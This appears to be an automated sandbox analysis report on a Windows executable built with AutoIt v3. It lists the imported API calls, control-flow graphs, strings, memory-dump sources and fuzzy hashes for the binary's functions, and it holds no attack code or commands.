          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
          • String ID: Include$\
          • API String ID: 3173733714-3429789819
          • Opcode ID: 5a59cf3ce6cd9e53fa7473ad48d8c049116ac846333585a3365dbf1a42801ef5
          • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
          • Opcode Fuzzy Hash: 5a59cf3ce6cd9e53fa7473ad48d8c049116ac846333585a3365dbf1a42801ef5
          • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

          Control-flow Graph

          APIs
          • _fseek.LIBCMT ref: 0045292B
            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
          • __fread_nolock.LIBCMT ref: 00452961
          • __fread_nolock.LIBCMT ref: 00452971
          • __fread_nolock.LIBCMT ref: 0045298A
          • __fread_nolock.LIBCMT ref: 004529A5
          • _fseek.LIBCMT ref: 004529BF
          • _malloc.LIBCMT ref: 004529CA
          • _malloc.LIBCMT ref: 004529D6
          • __fread_nolock.LIBCMT ref: 004529E7
          • _free.LIBCMT ref: 00452A17
          • _free.LIBCMT ref: 00452A20
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
          • String ID:
          • API String ID: 1255752989-0
          • Opcode ID: 6a8d82703acc5f5ad5eb2e6047ddaba95e5874ed327c1c23cd75a3a58bfd9f84
          • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
          • Opcode Fuzzy Hash: 6a8d82703acc5f5ad5eb2e6047ddaba95e5874ed327c1c23cd75a3a58bfd9f84
          • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 810 478656-4786cb call 40e710 call 4533eb call 4536f7 call 445ae0 819 4786d7-4786eb call 445ae0 810->819 820 4786cd-4786d2 810->820 825 4786f7-47870b call 445ae0 819->825 826 4786ed-4786f2 819->826 821 478787-478793 820->821 824 478797-4787c1 call 443758 call 40d200 GetDriveTypeW 821->824 836 4787c3-4787c6 824->836 837 4787cd-4787f8 call 40e680 call 411567 824->837 832 478714-478728 call 445ae0 825->832 833 47870d-478712 825->833 826->821 844 478731-478745 call 445ae0 832->844 845 47872a-47872f 832->845 833->821 838 4787fb-478807 836->838 839 4787c8-4787cb 836->839 837->838 838->824 843 478809-47880f 838->843 839->837 839->838 847 478811-478847 call 40e830 call 40cf00 call 408f40 843->847 848 47888c-478897 843->848 854 478747-47874c 844->854 855 47874e-478762 call 445ae0 844->855 845->821 860 4788a9-4788ba call 402250 847->860 871 478849-47884d 847->871 852 4788a0-4788a4 call 403c90 848->852 852->860 854->821 864 478764-478769 855->864 865 47876b-47877f call 445ae0 855->865 864->821 873 478785 865->873 874 478899-47889e 865->874 872 478851-478876 call 40cf00 call 40e710 871->872 879 478878-478889 call 402250 872->879 873->821 874->852
          APIs
            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
          • GetDriveTypeW.KERNEL32(?), ref: 004787B9
          • _wcscpy.LIBCMT ref: 004787E5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: BuffCharDriveLowerType_wcscpy_wcslen
          • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
          • API String ID: 3052893215-2127371420
          • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
          • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
          • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
          • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB

          Control-flow Graph

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __fread_nolock$_fseek_wcscpy
          • String ID: FILE
          • API String ID: 3888824918-3121273764
          • Opcode ID: c1a842079991e0571ddd3d2373b9fc1db2fff56e847d73cfd386b3e85dd9681d
          • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
          • Opcode Fuzzy Hash: c1a842079991e0571ddd3d2373b9fc1db2fff56e847d73cfd386b3e85dd9681d
          • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

          Control-flow Graph

          APIs
          • GetSysColorBrush.USER32 ref: 0041039B
          • LoadCursorW.USER32 ref: 004103AA
          • LoadIconW.USER32 ref: 004103C0
          • LoadIconW.USER32 ref: 004103D3
          • LoadIconW.USER32 ref: 004103E6
          • LoadImageW.USER32 ref: 0041040E
          • RegisterClassExW.USER32(?), ref: 0041045D
            • Part of subcall function 00410490: GetSysColorBrush.USER32 ref: 004104C3
            • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
            • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
            • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
            • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
            • Part of subcall function 00410490: LoadIconW.USER32 ref: 00410542
            • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(009D3FD8,000000FF,00000000), ref: 00410552
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
          • String ID: #$0$AutoIt v3
          • API String ID: 423443420-4155596026
          • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
          • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
          • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
          • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _malloc
          • String ID: Default
          • API String ID: 1579825452-753088835
          • Opcode ID: ac3c81674078742b70e30b7c85abb356a7461091c1998b7324db328fc8e89ea3
          • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
          • Opcode Fuzzy Hash: ac3c81674078742b70e30b7c85abb356a7461091c1998b7324db328fc8e89ea3
          • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1385 40f5c0-40f5cf call 422240 1388 40f5d0-40f5e8 1385->1388 1388->1388 1389 40f5ea-40f613 call 413650 call 410e60 1388->1389 1394 40f614-40f633 call 414d04 1389->1394 1397 40f691 1394->1397 1398 40f635-40f63c 1394->1398 1401 40f696-40f69c 1397->1401 1399 40f660-40f674 call 4150d1 1398->1399 1400 40f63e 1398->1400 1405 40f679-40f67c 1399->1405 1402 40f640 1400->1402 1404 40f642-40f650 1402->1404 1406 40f652-40f655 1404->1406 1407 40f67e-40f68c 1404->1407 1405->1394 1408 40f65b-40f65e 1406->1408 1409 425d1e-425d3e call 4150d1 call 414d04 1406->1409 1410 40f68e-40f68f 1407->1410 1411 40f69f-40f6ad 1407->1411 1408->1399 1408->1402 1422 425d43-425d5f call 414d30 1409->1422 1410->1406 1413 40f6b4-40f6c2 1411->1413 1414 40f6af-40f6b2 1411->1414 1416 425d16 1413->1416 1417 40f6c8-40f6d6 1413->1417 1414->1406 1416->1409 1418 425d05-425d0b 1417->1418 1419 40f6dc-40f6df 1417->1419 1418->1404 1421 425d11 1418->1421 1419->1406 1421->1416 1422->1401
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __fread_nolock_fseek_memmove_strcat
          • String ID: AU3!$EA06
          • API String ID: 1268643489-2658333250
          • Opcode ID: 2bf944a422d814460d06cfc7cd8a6c131d3cd46aa2c5a852c72b19ddfb5272df
          • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
          • Opcode Fuzzy Hash: 2bf944a422d814460d06cfc7cd8a6c131d3cd46aa2c5a852c72b19ddfb5272df
          • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1425 401100-401111 1426 401113-401119 1425->1426 1427 401179-401180 1425->1427 1429 401144-40114a 1426->1429 1430 40111b-40111e 1426->1430 1427->1426 1428 401182 1427->1428 1434 40112c-401141 DefWindowProcW 1428->1434 1432 401184-40118e call 401250 1429->1432 1433 40114c-40114f 1429->1433 1430->1429 1431 401120-401126 1430->1431 1431->1434 1435 42b038-42b03f 1431->1435 1442 401193-40119a 1432->1442 1436 401151-401157 1433->1436 1437 40119d 1433->1437 1435->1434 1441 42b045-42b059 call 401000 call 40e0c0 1435->1441 1439 401219-40121f 1436->1439 1440 40115d 1436->1440 1443 4011a3-4011a9 1437->1443 1444 42afb4-42afc5 call 40f190 1437->1444 1439->1431 1448 401225-42b06d call 468b0e 1439->1448 1446 401163-401166 1440->1446 1447 42b01d-42b024 1440->1447 1441->1434 1443->1431 1445 4011af 1443->1445 1444->1442 1445->1431 1451 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 1445->1451 1452 4011db-401202 SetTimer RegisterWindowMessageW 1445->1452 1454 42afe9-42b018 call 40f190 call 401a50 1446->1454 1455 40116c-401172 1446->1455 1447->1434 1453 42b02a-42b033 call 4370f4 1447->1453 1448->1442 1452->1442 1461 401204-401216 CreatePopupMenu 1452->1461 1453->1434 1454->1434 1455->1431 1463 401174-42afde call 45fd57 1455->1463 1463->1434 1476 42afe4 1463->1476 1476->1442
          APIs
          • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
          • KillTimer.USER32 ref: 004011B9
          • PostQuitMessage.USER32 ref: 004011CB
          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
          • CreatePopupMenu.USER32 ref: 00401204
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
          • String ID: TaskbarCreated
          • API String ID: 129472671-2362178303
          • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
          • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
          • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
          • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1477 4115d7-4115df 1478 4115ee-4115f9 call 4135bb 1477->1478 1481 4115e1-4115ec call 411988 1478->1481 1482 4115fb-4115fc 1478->1482 1481->1478 1485 4115fd-41160e 1481->1485 1486 411610-41163b call 417fc0 call 41130a 1485->1486 1487 41163c-411656 call 4180af call 418105 1485->1487 1486->1487
          APIs
          • _malloc.LIBCMT ref: 004115F1
            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
          • std::exception::exception.LIBCMT ref: 00411626
          • std::exception::exception.LIBCMT ref: 00411640
          • __CxxThrowException@8.LIBCMT ref: 00411651
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
          • String ID: ,*H$4*H$@fI
          • API String ID: 615853336-1459471987
          • Opcode ID: 82e626e187fd93f0b78ce583db7f2dc4e80f05ba1730a5b6497a9883058244d9
          • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
          • Opcode Fuzzy Hash: 82e626e187fd93f0b78ce583db7f2dc4e80f05ba1730a5b6497a9883058244d9
          • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
          APIs
            • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
            • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
            • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
          • KillTimer.USER32 ref: 004012D3
          • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
          • String ID:
          • API String ID: 3300667738-0
          • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
          • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
          • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
          • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
          APIs
          • RegOpenKeyExW.KERNEL32 ref: 0040E4DD
          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1), ref: 004271A6
          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1), ref: 004271ED
          • RegCloseKey.ADVAPI32(?), ref: 0042721E
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: QueryValue$CloseOpen
          • String ID: Include$Software\AutoIt v3\AutoIt
          • API String ID: 1586453840-614718249
          • Opcode ID: 4e4106e80d3ec8782ed713564e916a44295487f84b1bc38fce9797f37517d94b
          • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
          • Opcode Fuzzy Hash: 4e4106e80d3ec8782ed713564e916a44295487f84b1bc38fce9797f37517d94b
          • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
          APIs
          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00433EFD
          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00433F0D
          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00433F38
          • __wsplitpath.LIBCMT ref: 00433F63
            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
          • _wcscat.LIBCMT ref: 00433F76
          • __wcsicoll.LIBCMT ref: 00433F86
          • CloseHandle.KERNEL32(00000000), ref: 00433FBF
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
          • String ID:
          • API String ID: 2547909840-0
          • Opcode ID: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
          • Instruction ID: e17d583989bb1df9e9dd6b28cd90faaf4a95b78209a4298828de810110d6b8cb
          • Opcode Fuzzy Hash: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
          • Instruction Fuzzy Hash: 9621EAB2800109ABC721DF50DC84FEEB7B8AB48300F5045DEF60997240EB799B84CFA4
          APIs
          • CreateWindowExW.USER32 ref: 004105A5
          • CreateWindowExW.USER32 ref: 004105CE
          • ShowWindow.USER32(?,00000000), ref: 004105E4
          • ShowWindow.USER32(?,00000000), ref: 004105EE
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$CreateShow
          • String ID: AutoIt v3$edit
          • API String ID: 1584632944-3779509399
          • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
          • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
          • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
          • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
          APIs
          • RegOpenKeyExW.KERNEL32 ref: 0040F267
          • RegQueryValueExW.KERNEL32(00000000,?,00000000,00000000,?,?), ref: 0040F28E
          • RegCloseKey.ADVAPI32(?), ref: 0040F2B5
          • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
